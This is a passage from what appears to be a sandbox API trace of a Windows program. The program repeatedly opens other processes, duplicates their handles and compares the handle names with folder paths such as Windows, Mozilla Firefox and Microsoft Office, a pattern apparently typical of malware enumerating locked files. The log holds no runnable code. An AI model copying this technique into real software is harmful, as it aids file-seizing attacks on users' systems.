Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.384] CloseHandle (hObject=0x194) returned 1 [0163.384] CloseHandle (hObject=0x1e8) returned 1 [0163.384] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x860) returned 0x1e8 [0163.384] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.384] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.385] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.387] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.387] CloseHandle (hObject=0x1e4) returned 1 [0163.387] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.387] CloseHandle (hObject=0x194) returned 1 [0163.387] CloseHandle (hObject=0x1e8) returned 1 [0163.387] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x860) returned 0x1e8 [0163.387] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.391] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.392] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.393] CloseHandle (hObject=0x1e4) returned 1 [0163.393] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0163.393] CloseHandle (hObject=0x194) returned 1 [0163.393] CloseHandle (hObject=0x1e8) returned 1 [0163.393] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x870) returned 0x1e8 [0163.393] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.394] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.396] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.396] CloseHandle (hObject=0x1e4) returned 1 [0163.396] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.396] CloseHandle (hObject=0x194) returned 1 [0163.396] CloseHandle (hObject=0x1e8) returned 1 [0163.397] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x870) returned 0x1e8 [0163.397] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.397] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.398] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.399] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.399] CloseHandle (hObject=0x1e4) returned 1 [0163.399] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.399] CloseHandle (hObject=0x194) returned 1 [0163.402] CloseHandle (hObject=0x1e8) returned 1 [0163.402] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x890) returned 0x1e8 [0163.402] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.403] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.405] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.405] CloseHandle (hObject=0x1e4) returned 1 [0163.405] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.405] CloseHandle (hObject=0x194) returned 1 [0163.405] CloseHandle (hObject=0x1e8) returned 1 [0163.405] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x890) returned 0x1e8 [0163.405] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.406] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.407] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.407] CloseHandle (hObject=0x1e4) returned 1 [0163.408] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.408] CloseHandle (hObject=0x194) returned 1 [0163.408] CloseHandle (hObject=0x1e8) returned 1 [0163.408] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a0) returned 0x1e8 [0163.408] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.409] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.410] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.410] CloseHandle (hObject=0x1e4) returned 1 [0163.410] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.410] CloseHandle (hObject=0x194) returned 1 [0163.410] CloseHandle (hObject=0x1e8) returned 1 [0163.410] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a0) returned 0x1e8 [0163.410] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.413] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.414] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.414] CloseHandle (hObject=0x1e4) returned 1 [0163.415] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.415] CloseHandle (hObject=0x194) returned 1 [0163.415] CloseHandle (hObject=0x1e8) returned 1 [0163.415] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b0) returned 0x1e8 [0163.415] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.415] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.422] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.422] CloseHandle (hObject=0x1e4) returned 1 [0163.422] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.422] CloseHandle (hObject=0x194) returned 1 [0163.422] CloseHandle (hObject=0x1e8) returned 1 [0163.422] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b0) returned 0x1e8 [0163.422] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.422] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.423] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.424] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.424] CloseHandle (hObject=0x1e4) returned 1 [0163.424] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0163.424] CloseHandle (hObject=0x194) returned 1 [0163.424] CloseHandle (hObject=0x1e8) returned 1 [0163.424] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c0) returned 0x1e8 [0163.424] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.424] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.425] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.426] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.426] CloseHandle (hObject=0x1e4) returned 1 [0163.426] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.426] CloseHandle (hObject=0x194) returned 1 [0163.426] CloseHandle (hObject=0x1e8) returned 1 [0163.426] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c0) returned 0x1e8 [0163.426] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.426] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.427] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.427] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.428] CloseHandle (hObject=0x1e4) returned 1 [0163.428] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.428] CloseHandle (hObject=0x194) returned 1 [0163.428] CloseHandle (hObject=0x1e8) returned 1 [0163.428] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d0) returned 0x1e8 [0163.428] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.428] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.431] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.432] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.432] CloseHandle (hObject=0x1e4) returned 1 [0163.432] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.432] CloseHandle (hObject=0x194) returned 1 [0163.432] CloseHandle (hObject=0x1e8) returned 1 [0163.433] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d0) returned 0x1e8 [0163.433] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.433] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.434] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.434] CloseHandle (hObject=0x1e4) returned 1 [0163.435] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.435] CloseHandle (hObject=0x194) returned 1 [0163.435] CloseHandle (hObject=0x1e8) returned 1 [0163.435] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e0) returned 0x1e8 [0163.435] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.435] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.436] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.436] CloseHandle (hObject=0x1e4) returned 1 [0163.436] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.436] CloseHandle (hObject=0x194) returned 1 [0163.436] CloseHandle (hObject=0x1e8) returned 1 [0163.436] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e0) returned 0x1e8 [0163.436] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.437] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.438] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.438] CloseHandle (hObject=0x1e4) returned 1 [0163.438] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.438] CloseHandle (hObject=0x194) returned 1 [0163.438] CloseHandle (hObject=0x1e8) returned 1 [0163.438] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f0) returned 0x1e8 [0163.438] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.438] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.439] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.439] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.439] CloseHandle (hObject=0x1e4) returned 1 [0163.439] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.439] CloseHandle (hObject=0x194) returned 1 [0163.439] CloseHandle (hObject=0x1e8) returned 1 [0163.440] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f0) returned 0x1e8 [0163.440] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.440] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.441] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.441] CloseHandle (hObject=0x1e4) returned 1 [0163.441] _wcsicmp (_Str1="\\Mozilla Firefox", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.441] CloseHandle (hObject=0x194) returned 1 [0163.441] CloseHandle (hObject=0x1e8) returned 1 [0163.442] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x900) returned 0x1e8 [0163.442] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.443] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.444] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.444] CloseHandle (hObject=0x1e4) returned 1 [0163.444] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.444] CloseHandle (hObject=0x194) returned 1 [0163.444] CloseHandle (hObject=0x1e8) returned 1 [0163.444] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x900) returned 0x1e8 [0163.444] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.445] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.446] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.446] CloseHandle (hObject=0x1e4) returned 1 [0163.446] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.446] CloseHandle (hObject=0x194) returned 1 [0163.446] CloseHandle (hObject=0x1e8) returned 1 [0163.446] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x910) returned 0x1e8 [0163.446] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.447] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.448] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.448] CloseHandle (hObject=0x1e4) returned 1 [0163.448] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.448] CloseHandle (hObject=0x194) returned 1 [0163.448] CloseHandle (hObject=0x1e8) returned 1 [0163.448] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x910) returned 0x1e8 [0163.448] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.448] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.449] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.450] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.450] CloseHandle (hObject=0x1e4) returned 1 [0163.450] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0163.450] CloseHandle (hObject=0x194) returned 1 [0163.450] CloseHandle (hObject=0x1e8) returned 1 [0163.450] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x920) returned 0x1e8 [0163.450] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.450] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.451] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.452] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.452] CloseHandle (hObject=0x1e4) returned 1 [0163.452] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.452] CloseHandle (hObject=0x194) returned 1 [0163.452] CloseHandle (hObject=0x1e8) returned 1 [0163.452] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x920) returned 0x1e8 [0163.452] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.453] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.453] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.454] CloseHandle (hObject=0x1e4) returned 1 [0163.454] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.454] CloseHandle (hObject=0x194) returned 1 [0163.456] CloseHandle (hObject=0x1e8) returned 1 [0163.456] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x930) returned 0x1e8 [0163.456] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.457] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.458] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.458] CloseHandle (hObject=0x1e4) returned 1 [0163.458] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.458] CloseHandle (hObject=0x194) returned 1 [0163.458] CloseHandle (hObject=0x1e8) returned 1 [0163.458] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, 